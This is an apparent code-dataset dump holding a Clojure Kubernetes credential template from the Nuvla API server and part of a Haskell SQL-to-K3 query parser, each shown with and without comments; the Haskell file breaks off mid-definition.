_id stringlengths 64 64 | repository stringlengths 6 84 | name stringlengths 4 110 | content stringlengths 0 248k | license null | download_url stringlengths 89 454 | language stringclasses 7
values | comments stringlengths 0 74.6k | code stringlengths 0 248k |
|---|---|---|---|---|---|---|---|---|
4eb834dbb37c69099f8e4fa7b33542f3e1b65d391da8e93354eaac608064d168 | nuvla/api-server | credential_template_infrastructure_service_kubernetes.clj | (ns sixsq.nuvla.server.resources.credential-template-infrastructure-service-kubernetes
"
This credential-template creates a credential for a Kubernetes service.
These credentials include a certificate authority's public certificate ('ca'),
the user's public certificate ('cert'), and the user's private key ('key').
"
(:require
[sixsq.nuvla.auth.utils.acl :as acl-utils]
[sixsq.nuvla.server.resources.common.utils :as u]
[sixsq.nuvla.server.resources.credential-template :as p]
[sixsq.nuvla.server.resources.resource-metadata :as md]
[sixsq.nuvla.server.resources.spec.credential-template-infrastructure-service-coe :as ct-infra-service-coe]
[sixsq.nuvla.server.util.metadata :as gen-md]))
(def ^:const credential-subtype "infrastructure-service-kubernetes")
(def ^:const method "infrastructure-service-kubernetes")
(def ^:const resource-acl (acl-utils/normalize-acl {:owners ["group/nuvla-admin"]
:view-acl ["group/nuvla-user"]}))
;; No reasonable defaults for :parent, :ca, :cert, :key.
;; Do not provide values for those in the template
(def ^:const template {:id (str p/resource-type "/" method)
:resource-type p/resource-type
:acl resource-acl
:subtype credential-subtype
:method method
:ca "ca-public-certificate"
:cert "client-public-certificate"
:key "client-private-certificate"})
;;
;; multimethods for validation
;;
(def validate-fn (u/create-spec-validation-fn ::ct-infra-service-coe/schema))
(defmethod p/validate-subtype method
[resource]
(validate-fn resource))
;;
;; initialization: register this credential-template
;;
(def resource-metadata (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema))
(def resource-metadata-create (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema-create "create"))
(defn initialize
[]
(p/register template)
(md/register resource-metadata)
(md/register resource-metadata-create))
| null | https://raw.githubusercontent.com/nuvla/api-server/a64a61b227733f1a0a945003edf5abaf5150a15c/code/src/sixsq/nuvla/server/resources/credential_template_infrastructure_service_kubernetes.clj | clojure | No reasonable defaults for :parent, :ca, :cert, :key.
Do not provide values for those in the template
multimethods for validation
initialization: register this credential-template
| (ns sixsq.nuvla.server.resources.credential-template-infrastructure-service-kubernetes
"
This credential-template creates a credential for a Kubernetes service.
These credentials include a certificate authority's public certificate ('ca'),
the user's public certificate ('cert'), and the user's private key ('key').
"
(:require
[sixsq.nuvla.auth.utils.acl :as acl-utils]
[sixsq.nuvla.server.resources.common.utils :as u]
[sixsq.nuvla.server.resources.credential-template :as p]
[sixsq.nuvla.server.resources.resource-metadata :as md]
[sixsq.nuvla.server.resources.spec.credential-template-infrastructure-service-coe :as ct-infra-service-coe]
[sixsq.nuvla.server.util.metadata :as gen-md]))
(def ^:const credential-subtype "infrastructure-service-kubernetes")
(def ^:const method "infrastructure-service-kubernetes")
(def ^:const resource-acl (acl-utils/normalize-acl {:owners ["group/nuvla-admin"]
:view-acl ["group/nuvla-user"]}))
(def ^:const template {:id (str p/resource-type "/" method)
:resource-type p/resource-type
:acl resource-acl
:subtype credential-subtype
:method method
:ca "ca-public-certificate"
:cert "client-public-certificate"
:key "client-private-certificate"})
(def validate-fn (u/create-spec-validation-fn ::ct-infra-service-coe/schema))
(defmethod p/validate-subtype method
[resource]
(validate-fn resource))
(def resource-metadata (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema))
(def resource-metadata-create (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema-create "create"))
(defn initialize
[]
(p/register template)
(md/register resource-metadata)
(md/register resource-metadata-create))
|
f0b3fa131745719727f5ef351e1a4f5a2254234621b20d721a3f460f4c5b3c1a | DaMSL/K3 | SQL.hs | {-# LANGUAGE DoAndIfThenElse #-}
# LANGUAGE LambdaCase #
# LANGUAGE PatternSynonyms #
# LANGUAGE TupleSections #
# LANGUAGE ViewPatterns #
-- TODO:
3 . chain simplification
5 . expression case completion
6 . pushdown in subqueries
7 . subqueries in gbs , prjs , aggs
8 . correlated subqueries , and query decorrelation
-- x. more groupByPushdown, subquery and distributed plan testing
module Language.K3.Parser.SQL where
import Control.Arrow ( (***), (&&&), first, second )
import Control.Monad
import Control.Monad.State
import Control.Monad.Trans.Except
import Data.Function ( on )
import Data.Functor.Identity
import Data.Maybe ( catMaybes )
import Data.Either ( partitionEithers )
import Data.Monoid
import Data.List ( (\\), find, intersect, nub, isInfixOf, isPrefixOf, sortBy, unzip4 )
import Data.Map ( Map )
import Data.Set ( Set )
import Data.Tree
import qualified Data.Map as Map
import qualified Data.Set as Set
import Debug.Trace
import Database.HsSqlPpp.Ast
import Database.HsSqlPpp.Annotation hiding ( Annotation )
import qualified Database.HsSqlPpp.Annotation as HA ( Annotation )
import Database.HsSqlPpp.Parser
import Database.HsSqlPpp.Pretty
import Language.K3.Core.Annotation
import Language.K3.Core.Common
import Language.K3.Core.Declaration
import Language.K3.Core.Expression
import Language.K3.Core.Type
import Language.K3.Core.Literal
import Language.K3.Core.Metaprogram
import Language.K3.Core.Utils
import qualified Language.K3.Core.Constructor.Declaration as DC
import qualified Language.K3.Core.Constructor.Expression as EC
import qualified Language.K3.Core.Constructor.Literal as LC
import qualified Language.K3.Core.Constructor.Type as TC
import Language.K3.Utils.Pretty
import Language.K3.Utils.Pretty.Syntax
data OperatorFn = UnaryOp Operator ScalarExpr
| BinaryOp Operator ScalarExpr ScalarExpr
deriving (Eq, Show)
data AggregateFn = AggSum
| AggCount
| AggMin
| AggMax
deriving (Eq, Read, Show)
-- | Relation names and types.
type RTypeEnv = Map Identifier (K3 Type)
-- | Attribute dependency graph.
type ADGPtr = Int
data ADGNode = ADGNode { adnn :: Identifier
, adnt :: K3 Type
, adnr :: Maybe Identifier
, adne :: Maybe ScalarExpr
, adnch :: [ADGPtr] }
deriving (Eq, Show)
type ADGraph = Map ADGPtr ADGNode
-- | Scope frames are mappings of name paths (qualified or unqualified) to attributes.
type AttrPath = [Identifier]
type Qualifiers = [[Identifier]]
type AttrEnv = Map AttrPath ADGPtr
type ScopeFrame = (AttrEnv, [AttrPath], Qualifiers)
-- | Scope environments store bindings throughout a query's subexpressions.
type ScopeId = Int
type ScopeEnv = Map ScopeId ScopeFrame
-- | Internal query plan representation.
data QueryClosure = QueryClosure { qcfree :: [AttrPath]
, qcplan :: QueryPlan }
deriving (Eq, Show)
type SubqueryBindings = [(ScalarExpr, (Identifier, QueryClosure))]
data PlanCPath = PlanCPath { pcoutsid :: ScopeId
, pcselects :: ScalarExprList
, pcgroupbys :: ScalarExprList
, pcprojects :: SelectItemList
, pcaggregates :: SelectItemList
, pchaving :: MaybeBoolExpr
, pcbindings :: SubqueryBindings }
deriving (Eq, Show)
data PlanNode = PJoin { pnjprocsid :: ScopeId
, pnjoutsid :: ScopeId
, pnjtype :: Maybe (Natural, JoinType)
, pnjequalities :: [(ScalarExpr, ScalarExpr)]
, pnjpredicates :: ScalarExprList
, pnjpredbinds :: SubqueryBindings
, pnjpath :: [PlanCPath] }
| PSubquery { pnsqoutsid :: ScopeId
, pnqclosure :: QueryClosure }
| PTable { pntid :: Identifier
, pntoutsid :: ScopeId
, pntref :: Maybe TableRef
, pntbindmap :: Maybe BindingMap
, pntpath :: [PlanCPath] }
deriving (Eq, Show)
type PlanTree = Tree PlanNode
data QueryPlan = QueryPlan { qjoinTree :: Maybe PlanTree
, qpath :: [PlanCPath]
, qstageid :: Maybe Identifier }
deriving (Eq, Show)
-- | Binding mappings
type TypePrefix = Identifier
type TypePath = [Identifier]
type TypeMapping = Maybe (Either TypePrefix TypePath)
data BindingMap = BMNone
| BMTPrefix Identifier
| BMTFieldMap (Map Identifier TypePath)
| BMTVPartition (Map Identifier (Identifier, TypeMapping))
deriving (Eq, Show)
-- | Parsing state environment.
data SQLEnv = SQLEnv { relations :: RTypeEnv
, adgraph :: ADGraph
, scopeenv :: ScopeEnv
, aliassym :: ParGenSymS
, adpsym :: ParGenSymS
, spsym :: ParGenSymS
, sqsym :: ParGenSymS
, stgsym :: ParGenSymS
, slblsym :: ParGenSymS
, aggdsym :: ParGenSymS }
deriving (Eq, Show)
-- | A stateful SQL parsing monad.
type SQLParseM = ExceptT String (State SQLEnv)
-- | SQL program statements
data SQLDecl = SQLRel (Identifier, K3 Type)
| SQLStage (Identifier, K3 Type)
| SQLQuery QueryPlan
deriving (Eq, Show)
type StageGraph = [Either Identifier (Identifier, Identifier)]
{- Naming helpers. -}
materializeId :: Identifier -> Identifier
materializeId n = "output" ++ n
stageId :: Identifier -> Identifier
stageId n = "stage" ++ n
{- Type and alias helpers. -}
immutT :: K3 Type -> K3 Type
immutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TImmutable])
mutT :: K3 Type -> K3 Type
mutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TMutable])
immutE :: K3 Expression -> K3 Expression
immutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EImmutable])
mutE :: K3 Expression -> K3 Expression
mutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EMutable])
tupE :: [K3 Expression] -> K3 Expression
tupE [e] = immutE e
tupE el = EC.tuple $ map immutE el
recE :: [(Identifier, K3 Expression)] -> K3 Expression
recE ide = EC.record $ map (\(i,e) -> (i, immutE e)) ide
recT :: [(Identifier, K3 Type)] -> K3 Type
recT idt = TC.record $ map (\(i,t) -> (i, immutT t)) idt
telemM :: K3 Type -> SQLParseM (K3 Type)
telemM (tnc -> (TCollection, [t])) = return t
telemM t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t
tcolM :: K3 Type -> SQLParseM (K3 Type)
tcolM t = return $ (TC.collection t) @<- [TAnnotation "Collection", TImmutable]
taliaselemM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliaselemM alias t@(tnc -> (TRecord ids, ch)) =
case alias of
NoAlias _ -> return t
TableAlias _ _ -> return t
FullAlias _ _ fnc | length fnc == length ids -> return $ recT $ zip (map sqlnmcomponent fnc) ch
FullAlias _ _ _ -> throwE $ "Mismatched alias fields length"
taliaselemM _ t = throwE $ boxToString $ ["Invalid relation element type"] %$ prettyLines t
taliascolM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliascolM alias t@(tnc -> (TCollection, [et@(tag -> TRecord _)])) =
taliaselemM alias et >>= \net -> return $ (TC.collection net) @<- (annotations t)
taliascolM _ t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t
| Wraps a K3 record type with a ' elem ' label
twrapelemM :: K3 Type -> SQLParseM (K3 Type)
twrapelemM t@(tag -> TRecord _) = return $ recT [("elem", t)]
twrapelemM t = throwE $ boxToString $ ["Invalid element type for wrapping:"] %$ prettyLines t
-- | Wraps a collection's element type with an 'elem' label
twrapcolelemM :: K3 Type -> SQLParseM (K3 Type)
twrapcolelemM t@(tnc -> (TCollection, [et])) = twrapelemM et >>= \net -> return $ (TC.collection net) @<- annotations t
twrapcolelemM t = throwE $ boxToString $ ["Invalid collection type for wrapping:"] %$ prettyLines t
{- SQLParseM helpers. -}
runSQLParseM :: SQLEnv -> SQLParseM a -> (Either String a, SQLEnv)
runSQLParseM env m = flip runState env $ runExceptT m
runSQLParseEM :: SQLEnv -> SQLParseM a -> Either String (a, SQLEnv)
runSQLParseEM env m = r >>= return . (,e)
where (r,e) = runSQLParseM env m
evalSQLParseM :: SQLEnv -> SQLParseM a -> Either String a
evalSQLParseM env m = fst $ runSQLParseM env m
reasonM :: (String -> String) -> SQLParseM a -> SQLParseM a
reasonM errf = mapExceptT $ \m -> m >>= \case
Left err -> return $ Left $ errf err
Right r -> return $ Right r
errorM :: String -> SQLParseM a
errorM msg = reasonM id $ throwE msg
liftExceptM :: Except String a -> SQLParseM a
liftExceptM = mapExceptT (return . runIdentity)
liftEitherM :: Either String a -> SQLParseM a
liftEitherM = either throwE return
{- SQLEnv helpers -}
sqlenv0 :: SQLEnv
sqlenv0 = SQLEnv Map.empty Map.empty Map.empty contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS
-- | Relation type accessors
srlkup :: RTypeEnv -> Identifier -> Except String (K3 Type)
srlkup env x = maybe err return $ Map.lookup x env
where err = throwE $ "Unknown relation in sql parser environment: " ++ show x
srext :: RTypeEnv -> Identifier -> K3 Type -> RTypeEnv
srext env x t = Map.insert x t env
srdel :: RTypeEnv -> Identifier -> RTypeEnv
srdel env x = Map.delete x env
-- | Dependency graph accessors.
sglkup :: ADGraph -> ADGPtr -> Except String ADGNode
sglkup g p = maybe err return $ Map.lookup p g
where err = throwE $ "Unknown attribute node in sql parser environment: " ++ show p
sgext :: ADGraph -> ADGNode -> ParGenSymS -> (ADGPtr, ParGenSymS, ADGraph)
sgext g n sym = (ptr, nsym, Map.insert ptr n g)
where (nsym, ptr) = gensym sym
-- | Scope environment accessors.
sflkup :: ScopeFrame -> [Identifier] -> Except String ADGPtr
sflkup (fr,_,_) path = maybe err return $ Map.lookup path fr
where err = throwE $ unwords ["Invalid scope path:", show path, "in", show fr]
sftrylkup :: ScopeFrame -> [Identifier] -> Maybe ADGPtr
sftrylkup (fr,_,_) path = Map.lookup path fr
sfptrs :: ScopeFrame -> Except String [ADGPtr]
sfptrs sf@(fr, ord, _) = mapM (\p -> sflkup sf p) ord
sfpush :: ScopeFrame -> [Identifier] -> ADGPtr -> ScopeFrame
sfpush (fr,ord,q) path ptr = (Map.insert path ptr fr, ord ++ [path], nq)
where nq = if length path > 1 then (if init path `notElem` q then q ++ [init path] else q) else q
sfpop :: ScopeFrame -> [Identifier] -> (Maybe ADGPtr, ScopeFrame)
sfpop (fr,ord,q) path = (npopt, (nfr, filter (== path) ord, newq))
where (npopt, nfr) = Map.updateLookupWithKey (\_ _ -> Nothing) path fr
newquals = filter (not . null) $ map (\p -> if length p > 1 then init p else []) $ Map.keys nfr
newq = filter (`elem` newquals) q
sclkup :: ScopeEnv -> ScopeId -> Except String ScopeFrame
sclkup env p = maybe err return $ Map.lookup p env
where err = throwE $ "Unknown scope: " ++ show p
scpush :: ScopeEnv -> ScopeFrame -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scpush env fr sym = (ptr, nsym, Map.insert ptr fr env)
where (nsym, ptr) = gensym sym
scpop :: ScopeEnv -> (Maybe ScopeFrame, ScopeEnv)
scpop env = if Map.null env then (Nothing, env) else (Just fr, Map.delete sp env)
where (sp, fr) = Map.findMax env
scflkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
scflkup env sp path = sclkup env sp >>= \fr -> sflkup fr path
scftrylkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
scftrylkup env sp path = sclkup env sp >>= \fr -> return $ sftrylkup fr path
scfptrs :: ScopeEnv -> ScopeId -> Except String [ADGPtr]
scfptrs env sp = sclkup env sp >>= sfptrs
scfpush :: ScopeEnv -> [Identifier] -> ADGPtr -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scfpush env path np sym = if Map.null env then scpush env (Map.singleton path np, [path], pathqual) sym
else (sp, sym, Map.insert sp (sfpush fr path np) env)
where (sp,fr) = Map.findMax env
pathqual = if length path > 1 then [init path] else []
scfpop :: ScopeEnv -> [Identifier] -> (Maybe ADGPtr, ScopeEnv)
scfpop env path = if Map.null env then (Nothing, env) else (npopt, Map.insert sp nfr env)
where (sp, fr) = Map.findMax env
(npopt, nfr) = sfpop fr path
-- | Symbol generation.
sasext :: SQLEnv -> (Int, SQLEnv)
sasext senv = (n, senv {aliassym = nsym})
where (nsym, n) = gensym (aliassym senv)
stgsext :: SQLEnv -> (Int, SQLEnv)
stgsext senv = (n, senv {stgsym = nsym})
where (nsym, n) = gensym (stgsym senv)
ssqsext :: SQLEnv -> (Int, SQLEnv)
ssqsext senv = (n, senv {sqsym = nsym})
where (nsym, n) = gensym (sqsym senv)
slblsext :: SQLEnv -> (Int, SQLEnv)
slblsext senv = (n, senv {slblsym = nsym})
where (nsym, n) = gensym (slblsym senv)
saggsext :: SQLEnv -> (Int, SQLEnv)
saggsext senv = (n, senv {aggdsym = nsym})
where (nsym, n) = gensym (aggdsym senv)
-- | State accessors.
sqrlkup :: SQLEnv -> Identifier -> Except String (K3 Type)
sqrlkup senv n = srlkup (relations senv) n
sqrext :: SQLEnv -> Identifier -> K3 Type -> SQLEnv
sqrext senv n t = senv { relations = srext (relations senv) n t }
sqrdel :: SQLEnv -> Identifier -> SQLEnv
sqrdel senv n = senv { relations = srdel (relations senv) n }
sqglkup :: SQLEnv -> ADGPtr -> Except String ADGNode
sqglkup senv p = sglkup (adgraph senv) p
sqgext :: SQLEnv -> ADGNode -> (ADGPtr, SQLEnv)
sqgext senv n = (ptr, senv {adgraph = ng, adpsym = nsym})
where (ptr, nsym, ng) = sgext (adgraph senv) n (adpsym senv)
sqclkup :: SQLEnv -> ScopeId -> Except String ScopeFrame
sqclkup env p = sclkup (scopeenv env) p
sqcpush :: SQLEnv -> ScopeFrame -> (ScopeId, SQLEnv)
sqcpush env fr = (nsp, env {scopeenv = nenv, spsym = nsym})
where (nsp, nsym, nenv) = scpush (scopeenv env) fr (spsym env)
sqcpop :: SQLEnv -> (Maybe ScopeFrame, SQLEnv)
sqcpop env = (fropt, env { scopeenv = nsenv })
where (fropt, nsenv) = scpop (scopeenv env)
sqcflkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
sqcflkup env sp path = scflkup (scopeenv env) sp path
sqcftrylkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
sqcftrylkup env sp path = scftrylkup (scopeenv env) sp path
sqcfptrs :: SQLEnv -> ScopeId -> Except String [ADGPtr]
sqcfptrs env sp = scfptrs (scopeenv env) sp
sqcfpush :: SQLEnv -> [Identifier] -> ADGPtr -> (ScopeId, SQLEnv)
sqcfpush env path np = (nsp, env {scopeenv = nsenv, spsym = nsym})
where (nsp, nsym, nsenv) = scfpush (scopeenv env) path np (spsym env)
sqcfpop :: SQLEnv -> [Identifier] -> (Maybe ADGPtr, SQLEnv)
sqcfpop env path = (npopt, env {scopeenv = nsenv})
where (npopt, nsenv) = scfpop (scopeenv env) path
| Monadic accessors .
sqrlkupM :: Identifier -> SQLParseM (K3 Type)
sqrlkupM n = get >>= liftExceptM . (\env -> sqrlkup env n)
sqrextM :: Identifier -> K3 Type -> SQLParseM ()
sqrextM n t = get >>= \env -> return (sqrext env n t) >>= put
sqglkupM :: ADGPtr -> SQLParseM ADGNode
sqglkupM p = get >>= liftExceptM . (\env -> sqglkup env p)
sqgextM :: ADGNode -> SQLParseM ADGPtr
sqgextM n = get >>= \env -> return (sqgext env n) >>= \(r, nenv) -> put nenv >> return r
sqclkupM :: ScopeId -> SQLParseM ScopeFrame
sqclkupM sp = get >>= liftExceptM . (\env -> sqclkup env sp)
sqcpushM :: ScopeFrame -> SQLParseM ScopeId
sqcpushM fr = get >>= \env -> return (sqcpush env fr) >>= \(r, nenv) -> put nenv >> return r
sqcpopM :: SQLParseM (Maybe ScopeFrame)
sqcpopM = get >>= \env -> return (sqcpop env) >>= \(r, nenv) -> put nenv >> return r
sqcflkupM :: ScopeId -> [Identifier] -> SQLParseM ADGPtr
sqcflkupM sp path = get >>= liftExceptM . (\env -> sqcflkup env sp path)
sqcftrylkupM :: ScopeId -> [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcftrylkupM sp path = get >>= liftExceptM . (\env -> sqcftrylkup env sp path)
sqcfptrsM :: ScopeId -> SQLParseM [ADGPtr]
sqcfptrsM sp = get >>= liftExceptM . (\env -> sqcfptrs env sp)
sqcfpushM :: [Identifier] -> ADGPtr -> SQLParseM ScopeId
sqcfpushM path np = get >>= \env -> return (sqcfpush env path np) >>= \(r, nenv) -> put nenv >> return r
sqcfpopM :: [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcfpopM path = get >>= \env -> return (sqcfpop env path) >>= \(r, nenv) -> put nenv >> return r
sasextM :: SQLParseM Int
sasextM = get >>= \env -> return (sasext env) >>= \(i, nenv) -> put nenv >> return i
stgsextM :: SQLParseM Int
stgsextM = get >>= \env -> return (stgsext env) >>= \(i, nenv) -> put nenv >> return i
ssqsextM :: SQLParseM Int
ssqsextM = get >>= \env -> return (ssqsext env) >>= \(i, nenv) -> put nenv >> return i
slblsextM :: SQLParseM Int
slblsextM = get >>= \env -> return (slblsext env) >>= \(i, nenv) -> put nenv >> return i
saggsextM :: SQLParseM Int
saggsextM = get >>= \env -> return (saggsext env) >>= \(i, nenv) -> put nenv >> return i
{- Scope construction -}
sqgextScopeM :: Identifier -> [Identifier] -> [ADGPtr] -> SQLParseM ScopeId
sqgextScopeM qualifier ids ptrs = do
let paths = map (:[]) ids
let qpaths = map (\i -> [qualifier,i]) ids
sqcpushM (Map.fromList $ zip paths ptrs ++ zip qpaths ptrs, paths, [[qualifier]])
sqgextSchemaM :: Maybe Identifier -> K3 Type -> SQLParseM ScopeId
sqgextSchemaM (Just n) t = do
rt <- telemM t
case tnc rt of
(TRecord ids, ch) -> do
ptrs <- mapM sqgextM $ map (\(i, ct) -> ADGNode i ct (Just n) Nothing []) $ zip ids ch
sqgextScopeM n ids ptrs
_ -> throwE $ boxToString $ ["Invalid relational element type"] %$ prettyLines rt
sqgextSchemaM _ _ = throwE "No relation name specified when extending attribute graph"
sqgextAliasM :: Maybe Identifier -> K3 Type -> [ADGPtr] -> SQLParseM ScopeId
sqgextAliasM (Just n) t srcptrs = do
rt <- telemM t
case tag rt of
TRecord dstids | length dstids == length srcptrs -> do
destnodes <- mapM mknode $ zip dstids srcptrs
destptrs <- mapM sqgextM destnodes
sqgextScopeM n dstids destptrs
_ -> throwE $ boxToString $ ["Invalid alias type when extending attribute graph"] %$ prettyLines rt
where mknode (d, ptr) = do
node <- sqglkupM ptr
return $ ADGNode d (adnt node) (Just n) (Just $ Identifier emptyAnnotation $ Nmc $ adnn node) [ptr]
sqgextAliasM _ _ _ = throwE "Invalid alias arguments when extending attribute graph"
-- | Extend the attribute graph for a relation type computed from the given expressions.
sqgextExprM :: ScopeId -> Maybe Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
sqgextExprM sid (Just n) exprs = do
nodes <- mapM mknode exprs
ptrs <- mapM sqgextM nodes
sqgextScopeM n (map (\(i,_,_) -> i) exprs) ptrs
where mknode (i, t, e) = do
eptrs <- exprAttrs sid e
return $ ADGNode i t (Just n) (Just e) eptrs
sqgextExprM _ _ _ = throwE "Invalid expr arguments when extending attribute graph"
{- Relation type and name construction. -}
sqltabletype :: AttributeDefList -> SQLParseM (K3 Type)
sqltabletype attrs = sqlrectype attrs >>= tcolM
sqlrectype :: AttributeDefList -> SQLParseM (K3 Type)
sqlrectype attrs = mapM sqlattr attrs >>= \ts -> return (recT ts)
sqlattr :: AttributeDef -> SQLParseM (Identifier, K3 Type)
sqlattr (AttributeDef _ nm t _ _) = sqlnamedtype t >>= return . (sqlnmcomponent nm,)
-- TODO: timestamp, interval, size limits for numbers
sqltype :: String -> Maybe Int -> Maybe Int -> SQLParseM (K3 Type)
sqltype s lpOpt uOpt = case s of
"int" -> return TC.int
"integer" -> return TC.int
"real" -> return TC.real
"double precision" -> return TC.real
"text" -> return TC.string
"varchar" -> return $ maybe TC.string (\i -> TC.string @+ TProperty (Left $ "TPCHVarchar_" ++ show i)) lpOpt
"date" -> return $ TC.int @+ TProperty (Left "TPCHDate")
_ -> throwE $ "Invalid K3-SQL type: " ++ s
sqlnamedtype :: TypeName -> SQLParseM (K3 Type)
sqlnamedtype tn = case tn of
ArrayTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Vector"
Prec2TypeName _ s l u -> sqltype s (Just $ fromInteger l) (Just $ fromInteger u)
PrecTypeName _ s p -> sqltype s (Just $ fromInteger p) Nothing
SetOfTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Set"
SimpleTypeName _ s -> sqltype s Nothing Nothing
sqlnm :: Name -> String
sqlnm (Name _ comps) = concatMap sqlnmcomponent comps
sqlnmcomponent :: NameComponent -> String
sqlnmcomponent (Nmc s) = s
sqlnmcomponent (QNmc s) = s
sqlnmpath :: [NameComponent] -> [String]
sqlnmpath nmcl = map sqlnmcomponent nmcl
sqltablealias :: Identifier -> TableAlias -> Maybe Identifier
sqltablealias def alias = case alias of
NoAlias _ -> Just def
TableAlias _ nc -> Just $ "__" ++ sqlnmcomponent nc
FullAlias _ nc _ -> Just $ "__" ++ sqlnmcomponent nc
sqloperator :: String -> ScalarExprList -> Maybe OperatorFn
sqloperator "-" [x] = Just (UnaryOp ONeg x)
sqloperator "!not" [x] = Just (UnaryOp ONot x)
sqloperator "+" [x,y] = Just (BinaryOp OAdd x y)
sqloperator "-" [x,y] = Just (BinaryOp OSub x y)
sqloperator "*" [x,y] = Just (BinaryOp OMul x y)
sqloperator "/" [x,y] = Just (BinaryOp ODiv x y)
sqloperator "%" [x,y] = Just (BinaryOp OMod x y)
sqloperator "=" [x,y] = Just (BinaryOp OEqu x y)
sqloperator "!=" [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<>" [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<" [x,y] = Just (BinaryOp OLth x y)
sqloperator "<=" [x,y] = Just (BinaryOp OGeq x y)
sqloperator ">" [x,y] = Just (BinaryOp OGth x y)
sqloperator ">=" [x,y] = Just (BinaryOp OGeq x y)
sqloperator "!and" [x,y] = Just (BinaryOp OAnd x y)
sqloperator "!or" [x,y] = Just (BinaryOp OOr x y)
sqloperator _ _ = Nothing
{- SQL AST helpers. -}
projectionexprs :: SelectItemList -> ScalarExprList
projectionexprs sl = map projectionexpr sl
projectionexpr :: SelectItem -> ScalarExpr
projectionexpr (SelExp _ e) = e
projectionexpr (SelectItem _ e _) = e
mkprojection :: ScalarExpr -> SelectItem
mkprojection e = SelExp emptyAnnotation e
aggregateexprs :: SelectItemList -> SQLParseM (ScalarExprList, [AggregateFn])
aggregateexprs sl = mapM aggregateexpr sl >>= return . unzip
aggregateexpr :: SelectItem -> SQLParseM (ScalarExpr, AggregateFn)
aggregateexpr (projectionexpr -> e) = case e of
FunCall _ nm args -> do
let fn = sqlnm nm
case (fn, args) of
("sum" , [e']) -> return (e', AggSum)
("count", [e']) -> return (e', AggCount)
("min" , [e']) -> return (e', AggMin)
("max" , [e']) -> return (e', AggMax)
(_, _) -> throwE $ "Invalid aggregate expression: " ++ show e
_ -> throwE $ "Invalid aggregate expression: " ++ show e
mkaggregate :: AggregateFn -> SelectItem -> ScalarExpr -> SQLParseM SelectItem
mkaggregate fn agg e = case fn of
AggSum -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "sum"]) [e]
AggCount -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "count"]) [e]
AggMin -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "min"]) [e]
AggMax -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "max"]) [e]
where rt (SelExp _ _) e' = return (SelExp emptyAnnotation e')
rt (SelectItem _ _ nmc) e' = return (SelectItem emptyAnnotation e' nmc)
isAggregate :: ScalarExpr -> SQLParseM Bool
isAggregate (FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("sum" , [_]) -> return True
("count", [_]) -> return True
("min" , [_]) -> return True
("max" , [_]) -> return True
(_, _) -> return False
isAggregate _ = return False
TODO : qualified , more expression types
substituteExpr :: [(Identifier, ScalarExpr)] -> ScalarExpr -> SQLParseM ScalarExpr
substituteExpr bindings e = case e of
(Identifier _ (sqlnmcomponent -> i)) -> return $ maybe e id $ lookup i bindings
(QIdentifier _ _) -> throwE "Cannot substitute qualified expressions."
(FunCall ann nm args) -> mapM (substituteExpr bindings) args >>= \nargs -> return $ FunCall ann nm nargs
_ -> return e
{- Scope accessors. -}
attrIds :: AttrEnv -> SQLParseM [Identifier]
attrIds env = mapM (\ptr -> adnn <$> sqglkupM ptr) $ Map.elems env
singletonPath :: AttrPath -> SQLParseM Identifier
singletonPath [i] = return i
singletonPath p = throwE $ "Invalid singleton path: " ++ show p
uniqueScopeQualifier :: ScopeId -> SQLParseM Identifier
uniqueScopeQualifier sid = do
(_, _, quals) <- sqclkupM sid
case quals of
[[q]] -> return q
_ -> throwE $ "Invalid unique scope qualifier: " ++ show quals
unqualifiedAttrs :: ScopeFrame -> SQLParseM [Identifier]
unqualifiedAttrs (_, ord, _) = forM ord $ singletonPath
qualifiedAttrs :: AttrPath -> ScopeFrame -> SQLParseM AttrEnv
qualifiedAttrs prefix (fr, _, q)
| prefix `elem` q = return $ Map.filterWithKey (\path _ -> prefix `isPrefixOf` path) fr
| otherwise = throwE $ unwords ["Could not find qualifier:", show prefix, "(", show q, ")"]
partitionAttrEnv :: ScopeFrame -> SQLParseM (AttrEnv, AttrEnv)
partitionAttrEnv (fr,_,_) = return $ Map.partitionWithKey (\path _ -> length path <= 1) fr
partitionCommonQualifedAttrEnv :: ScopeFrame -> SQLParseM (Map AttrPath AttrEnv)
partitionCommonQualifedAttrEnv (fr, ord, _) = return $ Map.foldlWithKey (addQualifiedCommon ord) Map.empty fr
where
addQualifiedCommon commons acc path ptr
| length path <= 1 = acc
| otherwise =
let (qual, attr) = (init path, last path) in
if [attr] `notElem` commons then acc else Map.alter (inject [attr] ptr) qual acc
inject path ptr Nothing = Just $ Map.singleton path ptr
inject path ptr (Just aenv) = Just $ Map.insert path ptr aenv
unqualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
unqualifiedScopeFrame (fr, ord, _)
